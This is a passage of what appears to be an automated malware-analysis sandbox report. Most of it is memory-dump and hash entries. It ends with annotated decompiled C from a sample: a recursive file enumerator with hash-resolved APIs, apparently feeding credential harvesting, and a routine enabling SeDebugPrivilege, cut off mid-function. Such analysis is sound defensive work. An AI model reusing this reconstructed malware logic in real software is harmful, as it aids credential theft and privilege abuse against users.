                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetWindowLongW.USER32(?,?,?), ref: 0279FF9D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: LongWindow
                                  • String ID:
                                  • API String ID: 1378638983-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetWindowLongW.USER32(?,?,?), ref: 0279FF9D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID: LongWindow
                                  • String ID:
                                  • API String ID: 1378638983-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288970284.0000000000DFD000.00000040.00000001.sdmp, Offset: 00DFD000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288984501.0000000000E0D000.00000040.00000001.sdmp, Offset: 00E0D000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288984501.0000000000E0D000.00000040.00000001.sdmp, Offset: 00E0D000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288984501.0000000000E0D000.00000040.00000001.sdmp, Offset: 00E0D000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288970284.0000000000DFD000.00000040.00000001.sdmp, Offset: 00DFD000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288984501.0000000000E0D000.00000040.00000001.sdmp, Offset: 00E0D000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288970284.0000000000DFD000.00000040.00000001.sdmp, Offset: 00DFD000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288970284.0000000000DFD000.00000040.00000001.sdmp, Offset: 00DFD000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: D0l
                                  • API String ID: 0-3512419482
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: UlA
                                  • API String ID: 0-501016178
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a02326eb9feafdba2744e11cc117ae60302a28108314a952ed5f79ce62b0c4b7
                                  • Instruction ID: 70f40259cc1adb34f6383bc9b43374bf3ef1cf88f13796a265ddf517eddf4165
                                  • Opcode Fuzzy Hash: a02326eb9feafdba2744e11cc117ae60302a28108314a952ed5f79ce62b0c4b7
                                  • Instruction Fuzzy Hash: D5A11874E142198BCB14DFA5C980AAEFBF2FF89704F24C1AAD409A7356D7309A41CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.289097828.0000000002790000.00000040.00000001.sdmp, Offset: 02790000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb1470cb62a7746778c6c8005ebbf1a0ac9dfc8b1ab2b57267c8f4299e7afe1b
                                  • Instruction ID: f2f6f7aedaacd25eab24dbc0cfb566d6b6089e8ca91eec84cf41b2ec544659db
                                  • Opcode Fuzzy Hash: bb1470cb62a7746778c6c8005ebbf1a0ac9dfc8b1ab2b57267c8f4299e7afe1b
                                  • Instruction Fuzzy Hash: 42C129B1C917458BD712DF65E888B897F71FB86328F90CA09D1617BAD0D7B4106ACF88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c32b6ff9b15d2d4d72a2150c602fb08a17e63bd4ef5672104a344491ecae23c0
                                  • Instruction ID: da63c7dadaff03fa42891e669bf81401045cb01e120f3a329ee08af6fb1a6b86
                                  • Opcode Fuzzy Hash: c32b6ff9b15d2d4d72a2150c602fb08a17e63bd4ef5672104a344491ecae23c0
                                  • Instruction Fuzzy Hash: 307124B0E1560A9BCB14CFE6E4815AEFBF2FF99301F60956AD405B7314E7348A428F94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 796adbbfdf13ceeadd88085d3d4d6ab2fb1fd7b7cd99c000ad9dba544566bf51
                                  • Instruction ID: 6f9809fe69d48cab8cc8f24d17780037104bd04f55b8da415cd3d0574619fbcd
                                  • Opcode Fuzzy Hash: 796adbbfdf13ceeadd88085d3d4d6ab2fb1fd7b7cd99c000ad9dba544566bf51
                                  • Instruction Fuzzy Hash: 387122B4E1560A8BCB14CFE5E4815AEFBF2FF99301F60956AD405B7314E7348A828F94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c7e73ac1cfed543759280b9b92d62e7850997cb2d2344ba55b2cd1a4a4c42f49
                                  • Instruction ID: bf01a315e7c66a959a604cd322ca8fcbb1be0e4213750b5fdfb4f9044a39b2e5
                                  • Opcode Fuzzy Hash: c7e73ac1cfed543759280b9b92d62e7850997cb2d2344ba55b2cd1a4a4c42f49
                                  • Instruction Fuzzy Hash: CD813874A142599BCB14CFA9C9806AEFBF2EF88304F24C5AAD408A7355E7309981CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 65944900a072bad9c3ea8a937e75c3ab979b5780f8aa8d8128f28592e1345b07
                                  • Instruction ID: ffe5476d90f40cb955b4f45716a533f9ef0c523d7d3a1ed6cbcc7253756b926f
                                  • Opcode Fuzzy Hash: 65944900a072bad9c3ea8a937e75c3ab979b5780f8aa8d8128f28592e1345b07
                                  • Instruction Fuzzy Hash: ED713B70E112199BDB14DFA9C980A9EFBF7FF88300F24C4AAD408A7355E73099818F60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 01d221233675d9d9a840f3213c8b2629ef8b3bdbf1d62cc37ee3b15e0da5ecfa
                                  • Instruction ID: 0fd50893ff1ed071d3a9161f517546cce2c5241428ed6b139fd61c802b5e6c85
                                  • Opcode Fuzzy Hash: 01d221233675d9d9a840f3213c8b2629ef8b3bdbf1d62cc37ee3b15e0da5ecfa
                                  • Instruction Fuzzy Hash: 4D51E674E102598BCB54CF69D980AAEFBF6FB88304F24C1AAD408A7315DB309A41DF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 46487ff4aca82a2459c104a55f4d4d6398a96a21539d551016086c6a42e11866
                                  • Instruction ID: 5d0c15869498ca1adbbb897d2ceab2da6ad2159e19d50dc4031435f2613e9830
                                  • Opcode Fuzzy Hash: 46487ff4aca82a2459c104a55f4d4d6398a96a21539d551016086c6a42e11866
                                  • Instruction Fuzzy Hash: 4C511B74E152588FCB54CF69D980A9EFBF2BF89304F24C1AAD408A7356DB309A41DF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3ffcf6a04a3b0c53e27caec1f8f7d850a0cda9b181800ed3c59106831c5f6774
                                  • Instruction ID: b686619959f71f050824d1c199e8c21064821bdd016c56e27a2239968f3a2cdd
                                  • Opcode Fuzzy Hash: 3ffcf6a04a3b0c53e27caec1f8f7d850a0cda9b181800ed3c59106831c5f6774
                                  • Instruction Fuzzy Hash: E45147B4D19249DFCB05DFAAC5806AEFFF2AF89300F24C1AAC405E7255E7345A45CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 509746a0384f14dee5a1379ade4e127ac7a4739e4879cb2a351486625cea5ca8
                                  • Instruction ID: 1140523285aa34a3dd40799a2ab122530a914f9c1b2737c935935b4a69e00884
                                  • Opcode Fuzzy Hash: 509746a0384f14dee5a1379ade4e127ac7a4739e4879cb2a351486625cea5ca8
                                  • Instruction Fuzzy Hash: ED41E9B4D1560ADBCB48DFA6C5806AEFBF2BF88300F24C56AC405B7354E7345A418F95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6a2471b496a156e8058c36949e73c1ee04e4240e6723b6eff88f7e5623265f8c
                                  • Instruction ID: 306b032476e7039f12331c9bac0ae2e125e9e583cbf0f9594a21dcd0827eca76
                                  • Opcode Fuzzy Hash: 6a2471b496a156e8058c36949e73c1ee04e4240e6723b6eff88f7e5623265f8c
                                  • Instruction Fuzzy Hash: 71310C74E152199BDB18CFAAD9406EEFBF6FBC9300F14C4AAD508A7314EB305A458F61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 80ccba9b88288c237464805401fddcb7640fa8d4defe5e9ac7c627dd6480da01
                                  • Instruction ID: 45b8a45fab80efceb999c102cdb3c79f74d82bd5d0cbf4d44fea23d84962500c
                                  • Opcode Fuzzy Hash: 80ccba9b88288c237464805401fddcb7640fa8d4defe5e9ac7c627dd6480da01
                                  • Instruction Fuzzy Hash: 60312A70E156099FDB58CFAAD95069EFBF3AFC9300F18C4AAD408A7355EB304A458F61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.288894024.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 093a3e62ec9343afb3d6256b618ef4690e40e57f2830656bd917d9021f7fdff9
                                  • Instruction ID: ea6e518d69cc88a67084d178ddb5d855905e1af3c3e9126a75c83cb75309f0dc
                                  • Opcode Fuzzy Hash: 093a3e62ec9343afb3d6256b618ef4690e40e57f2830656bd917d9021f7fdff9
                                  • Instruction Fuzzy Hash: 86214170E116199BDB58CFAAD94069EFAF3EFC8300F18C4AAD408A7354EB304A458F51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Executed Functions

                                  C-Code - Quality: 85%
                                  			// Analyst reading (added annotation, not decompiler output): recursive file
                                  			// enumerator. _a4 = base directory; _a8 = file pattern, joined as "%s\%s";
                                  			// _a12 = optional callback that receives each full path (NULL: the first
                                  			// match is returned to the caller instead); _a16 nonzero = descend into
                                  			// subdirectories before matching here; _a20 nonzero = directory entries may
                                  			// satisfy the pattern; _a24 nonzero = skip the "Windows" and "Program Files"
                                  			// subtrees. Helper roles inferred from usage: E00405B6F allocating swprintf,
                                  			// E00405D24 wcslen, E00405EFF name compare returning nonzero on match,
                                  			// E00402BAB free, E00403BEF FindClose. The E004031E5(..., <32-bit constant>, ...)
                                  			// call issued before every Win32 import is consistent with hash-based API
                                  			// resolution. The "/* 00403xxx */" prefixes are the report's per-statement
                                  			// address column; lines without one have no address in the report.
                                  			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                  				struct _WIN32_FIND_DATAW _v596;
                                  				void* __ebx;
                                  				void* _t35;
                                  				int _t43;
                                  				void* _t52;
                                  				int _t56;
                                  				intOrPtr _t60;
                                  				void* _t66;
                                  				void* _t73;
                                  				void* _t74;
                                  				WCHAR* _t98;
                                  				void* _t99;
                                  				void* _t100;
                                  				void* _t101;
                                  				WCHAR* _t102;
                                  				void* _t103;
                                  				void* _t104;
                                  
                                  				/* 00403d82 */ L004067C4(0xa); // executed
                                  				/* 00403d88 */ _t72 = 0;
                                  				/* 00403d8c */ _t100 = 0x2e;
                                  				/* 00403d8d */ _t106 = _a16;
                                  				/* 00403d90 */ if(_a16 == 0) { // _a16 == 0: no descent, jump straight to the pattern pass at L15
                                  				/* 00403ea9 */ 	L15:
                                  				/* 00403ea9 */ 	_push(_a8);
                                  				/* 00403eb9 */ 	_t98 = E00405B6F(0, L"%s\\%s", _a4); // "<base>\<pattern>"
                                  				/* 00403ebb */ 	_t104 = _t103 + 0xc;
                                  				/* 00403ec0 */ 	if(_t98 == 0) {
                                  				/* 00403f95 */ 		L30:
                                  				/* 00403f95 */ 		__eflags = 0;
                                  				               		return 0;
                                  				/* 00403f95 */ 	}
                                  				/* 00403ece */ 	E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
                                  				/* 00403edb */ 	_t35 = FindFirstFileW(_t98,  &_v596); // executed
                                  				/* 00403edd */ 	_t73 = _t35;
                                  				/* 00403ee2 */ 	if(_t73 == 0xffffffff) {
                                  				/* 00403f8e */ 		L29:
                                  				/* 00403f8f */ 		E00402BAB(_t98);
                                  				               		goto L30;
                                  				/* 00403f94 */ 	}
                                  				               	L17:
                                  				/* 00403ee8 */ 	while(1) {
                                  				/* 00403ef8 */ 		if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) { // stand-in for skipping "." and ".."; also drops any 1-2 char name starting with '.'
                                  				/* 00403f0a */ 			if(_v596.dwFileAttributes != 0x10) { // exact compare: a directory with any extra attribute bit (hidden, system) is treated like a file
                                  				/* 00403f12 */ 				L21:
                                  				/* 00403f18 */ 				_push( &(_v596.cFileName));
                                  				/* 00403f26 */ 				_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
                                  				/* 00403f28 */ 				_t104 = _t104 + 0xc;
                                  				/* 00403f2d */ 				if(_t101 == 0) {
                                  				               					goto L24;
                                  				               				}
                                  				/* 00403f33 */ 				if(_a12 == 0) { // no callback: return the first matching path
                                  				/* 00403f76 */ 					E00402BAB(_t98);
                                  				/* 00403f7c */ 					E00403BEF(_t73);
                                  				               					return _t101;
                                  				/* 00403f83 */ 				}
                                  				/* 00403f36 */ 				_a12(_t101); // callback receives the full path; the buffer is freed right after
                                  				/* 00403f3a */ 				E00402BAB(_t101);
                                  				               				goto L24;
                                  				/* 00403f40 */ 			}
                                  				/* 00403f0c */ 			_t124 = _a20;
                                  				/* 00403f10 */ 			if(_a20 == 0) {
                                  				               				goto L24;
                                  				               			}
                                  				               			goto L21;
                                  				/* 00403f41 */ 		} else {
                                  				/* 00403f41 */ 			L24:
                                  				/* 00403f4b */ 			E004031E5(_t73, 0, 0xce4477cc, 0, 0);
                                  				/* 00403f58 */ 			_t43 = FindNextFileW(_t73,  &_v596); // executed
                                  				/* 00403f5c */ 			if(_t43 == 0) {
                                  				/* 00403f88 */ 				E00403BEF(_t73); // executed
                                  				               				goto L29;
                                  				/* 00403f8d */ 			}
                                  				/* 00403f60 */ 			_t100 = 0x2e;
                                  				               			continue;
                                  				/* 00403f60 */ 		}
                                  				/* 00403ef8 */ 	}
                                  				/* 00403ee8 */ }
                                  				/* 00403da3 */ _t102 = E00405B6F(_t106, L"%s\\*", _a4); // _a16 != 0: enumerate every entry of the base directory first
                                  				/* 00403da9 */ if(_t102 == 0) {
                                  				/* 00403ea6 */ 	L14:
                                  				/* 00403ea8 */ 	_t100 = 0x2e;
                                  				               	goto L15;
                                  				/* 00403ea8 */ }
                                  				/* 00403db7 */ E004031E5(0, 0, 0xd4f4acea, 0, 0);
                                  				/* 00403dc4 */ _t52 = FindFirstFileW(_t102,  &_v596); // executed
                                  				/* 00403dc6 */ _t74 = _t52;
                                  				/* 00403dcb */ if(_t74 == 0xffffffff) {
                                  				/* 00403e9d */ 	L13:
                                  				/* 00403e9e */ 	E00402BAB(_t102);
                                  				/* 00403ea4 */ 	_t72 = 0;
                                  				               	goto L14;
                                  				               } else {
                                  				               	goto L3;
                                  				               }
                                  				/* 00403dd1 */ do {
                                  				/* 00403dd1 */ 	L3:
                                  				/* 00403dd8 */ 	if((_v596.dwFileAttributes & 0x00000010) == 0) { // bit test here, unlike the exact compare in the pattern pass
                                  				               		goto L11;
                                  				               	}
                                  				/* 00403de2 */ 	if(_a24 == 0) {
                                  				/* 00403e12 */ 		L7:
                                  				/* 00403e22 */ 		if(E00405D24( &(_v596.cFileName)) >= 3) {
                                  				/* 00403e30 */ 			L9:
                                  				/* 00403e36 */ 			_push( &(_v596.cFileName));
                                  				/* 00403e3f */ 			_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
                                  				/* 00403e44 */ 			_t103 = _t103 + 0xc;
                                  				/* 00403e47 */ 			_a16 = _t60; // the _a16 slot is reused to hold the child path
                                  				/* 00403e4a */ 			_t115 = _t60;
                                  				/* 00403e4c */ 			if(_t60 == 0) {
                                  				               				goto L11;
                                  				               			}
                                  				/* 00403e63 */ 			_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1); // recurse: keep descending, directories never match, always skip the two system dirs
                                  				/* 00403e65 */ 			E00402BAB(_a16);
                                  				/* 00403e6a */ 			_t103 = _t103 + 0x1c;
                                  				/* 00403e6f */ 			if(_t99 != 0) { // a child returned a path (callback-less mode): propagate it up
                                  				/* 00403f64 */ 				E00402BAB(_t102);
                                  				/* 00403f6a */ 				E00403BEF(_t74);
                                  				               				return _t99;
                                  				/* 00403f71 */ 			}
                                  				               			goto L11;
                                  				/* 00403e6f */ 		}
                                  				/* 00403e26 */ 		_t66 = 0x2e;
                                  				/* 00403e27 */ 		_t114 = _v596.cFileName - _t66;
                                  				/* 00403e2e */ 		if(_v596.cFileName == _t66) {
                                  				               			goto L11;
                                  				               		}
                                  				               		goto L9;
                                  				/* 00403e2e */ 	}
                                  				/* 00403dea */ 	_push(L"Windows");
                                  				/* 00403df9 */ 	if(E00405EFF( &(_v596.cFileName)) != 0) { // _a24 != 0: never descend into Windows or Program Files
                                  				               		goto L11;
                                  				               	}
                                  				/* 00403e01 */ 	_push(L"Program Files");
                                  				/* 00403e10 */ 	if(E00405EFF( &(_v596.cFileName)) != 0) {
                                  				               		goto L11;
                                  				               	}
                                  				               	goto L7;
                                  				/* 00403e75 */ 	L11:
                                  				/* 00403e7f */ 	E004031E5(_t74, 0, 0xce4477cc, 0, 0);
                                  				/* 00403e8c */ 	_t56 = FindNextFileW(_t74,  &_v596); // executed
                                  				/* 00403e8e */ } while (_t56 != 0);
                                  				/* 00403e97 */ E00403BEF(_t74); // executed
                                  				               goto L13;
                                  			}

                                  APIs
                                  • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                  • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                  • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                  • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileFind$FirstNext
                                  • String ID: %s\%s$%s\*$Program Files$Windows
                                  • API String ID: 1690352074-2009209621
                                  • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                  • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                  • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                  • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                  Uniqueness

                                  Uniqueness Score: -1.00%
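                                  The listing for E00403D74 above applies three selection rules that are easy to misread in decompiler output: a bit test on FILE_ATTRIBUTE_DIRECTORY in the descent pass, an exact comparison against 0x10 in the pattern pass, and a length/first-character heuristic in place of comparing with "." and "..". The following is an added example, not code from the sample or from the report, that models those rules in portable C over a constructed directory listing. The attribute constant is the documented Win32 value, E00405EFF is assumed to be an equality compare that returns nonzero on a match, and the entry names in SAMPLE_DIR are made up for the demonstration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <wchar.h>

#define FILE_ATTRIBUTE_DIRECTORY_ 0x10u   /* documented Win32 value; the listing uses the literal 0x10 */

/* E00405D24(cFileName) >= 3 || cFileName[0] != '.' in both passes of the
 * listing: the sample's stand-in for skipping "." and "..". It also drops
 * any one- or two-character name that starts with a dot. */
bool name_passes_dot_check(const wchar_t *name)
{
    return wcslen(name) >= 3 || name[0] != L'.';
}

/* Descent pass (entered only when _a16 != 0): bit test on the directory
 * attribute, then, when _a24 != 0, the two system directory names are
 * skipped, then the dot check. Assumption: E00405EFF is an equality compare
 * returning nonzero on a match. */
bool recurse_into(const wchar_t *name, uint32_t attrs, bool skip_system_dirs)
{
    if ((attrs & FILE_ATTRIBUTE_DIRECTORY_) == 0)
        return false;
    if (skip_system_dirs &&
        (wcscmp(name, L"Windows") == 0 || wcscmp(name, L"Program Files") == 0))
        return false;
    return name_passes_dot_check(name);
}

/* Pattern pass (base\pattern): dot check first, then the exact comparison
 * dwFileAttributes != 0x10. Anything that is not a plain directory, including
 * a hidden or system directory, counts as a match; a plain directory counts
 * only when _a20 != 0. */
bool report_match(const wchar_t *name, uint32_t attrs, bool allow_dirs)
{
    if (!name_passes_dot_check(name))
        return false;
    if (attrs != FILE_ATTRIBUTE_DIRECTORY_)
        return true;
    return allow_dirs;
}

/* Constructed directory listing (not taken from the sample's environment),
 * used to show which entries each pass acts on. */
typedef struct { const wchar_t *name; uint32_t attrs; } entry_t;

static const entry_t SAMPLE_DIR[] = {
    { L".",             0x10 },
    { L"..",            0x10 },
    { L"Windows",       0x10 },
    { L"Program Files", 0x10 },
    { L"Users",         0x10 },
    { L".secret",       0x12 },   /* hidden directory */
    { L".a",            0x20 },   /* two-character dotfile */
    { L"notes.ini",     0x20 },
};
#define SAMPLE_DIR_LEN (sizeof SAMPLE_DIR / sizeof SAMPLE_DIR[0])

/* Number of entries the descent pass would recurse into at this level. */
size_t count_descended(bool skip_system_dirs)
{
    size_t n = 0;
    for (size_t i = 0; i < SAMPLE_DIR_LEN; i++)
        n += recurse_into(SAMPLE_DIR[i].name, SAMPLE_DIR[i].attrs, skip_system_dirs);
    return n;
}

/* Number of entries the pattern pass would hand to the callback (or return). */
size_t count_reported(bool allow_dirs)
{
    size_t n = 0;
    for (size_t i = 0; i < SAMPLE_DIR_LEN; i++)
        n += report_match(SAMPLE_DIR[i].name, SAMPLE_DIR[i].attrs, allow_dirs);
    return n;
}
```

                                  Two consequences are worth keeping in mind when reasoning about what the credential-harvesting callers of this routine actually see: a hidden or system directory (attributes 0x12, 0x14) is returned by the pattern pass as if it were a file even when _a20 is zero, while any one- or two-character name that begins with '.' is neither descended into nor reported.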

                                  C-Code - Quality: 78%
                                  			// Analyst reading (added annotation, not decompiler output): enables
                                  			// SeDebugPrivilege in the process token, the routine behind the report's
                                  			// "Enables debug privileges" signature. E004060AC is assumed to return the
                                  			// process handle (GetCurrentProcess-like). E004031E5 returns the resolved
                                  			// import: the one resolved through 0xea792a5f is called as
                                  			// (handle, 0x28, &token), the OpenProcessToken signature with
                                  			// TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY; E00403C40 is assumed to close the
                                  			// handle. _v32/_v24/_v20 are one TOKEN_PRIVILEGES: PrivilegeCount,
                                  			// Luid.LowPart, Luid.HighPart, Attributes = 2 (SE_PRIVILEGE_ENABLED); the
                                  			// 0x10 passed to AdjustTokenPrivileges is its size. The "/* 00406xxx */"
                                  			// prefixes are the report's per-statement address column.
                                  			E0040650A(void* __eax, void* __ebx, void* __eflags) {
                                  				void* _v8;
                                  				struct _LUID _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				struct _TOKEN_PRIVILEGES _v32;
                                  				intOrPtr* _t13;
                                  				void* _t14;
                                  				int _t16;
                                  				int _t31;
                                  				void* _t32;
                                  
                                  				/* 00406512 */ _t31 = 0;
                                  				/* 00406514 */ E004060AC();
                                  				/* 00406522 */ _t32 = __eax;
                                  				/* 00406524 */ _t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                                  				/* 00406530 */ _t14 =  *_t13(_t32, 0x28,  &_v8); // OpenProcessToken(handle, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token)
                                  				/* 00406534 */ if(_t14 != 0) {
                                  				/* 0040653f */ 	E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
                                  				/* 0040654e */ 	_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
                                  				/* 00406552 */ 	if(_t16 != 0) {
                                  				/* 0040655a */ 		_push(__ebx);
                                  				/* 0040655f */ 		_v32.Privileges = _v16.LowPart; // Privileges[0].Luid.LowPart
                                  				/* 0040656d */ 		_v32.PrivilegeCount = 1;
                                  				/* 00406570 */ 		_v24 = _v16.HighPart; // Privileges[0].Luid.HighPart
                                  				/* 00406573 */ 		_v20 = 2; // Privileges[0].Attributes = SE_PRIVILEGE_ENABLED
                                  				/* 0040657a */ 		E004031E5(1, 9, 0xc1642df2, 0, 0);
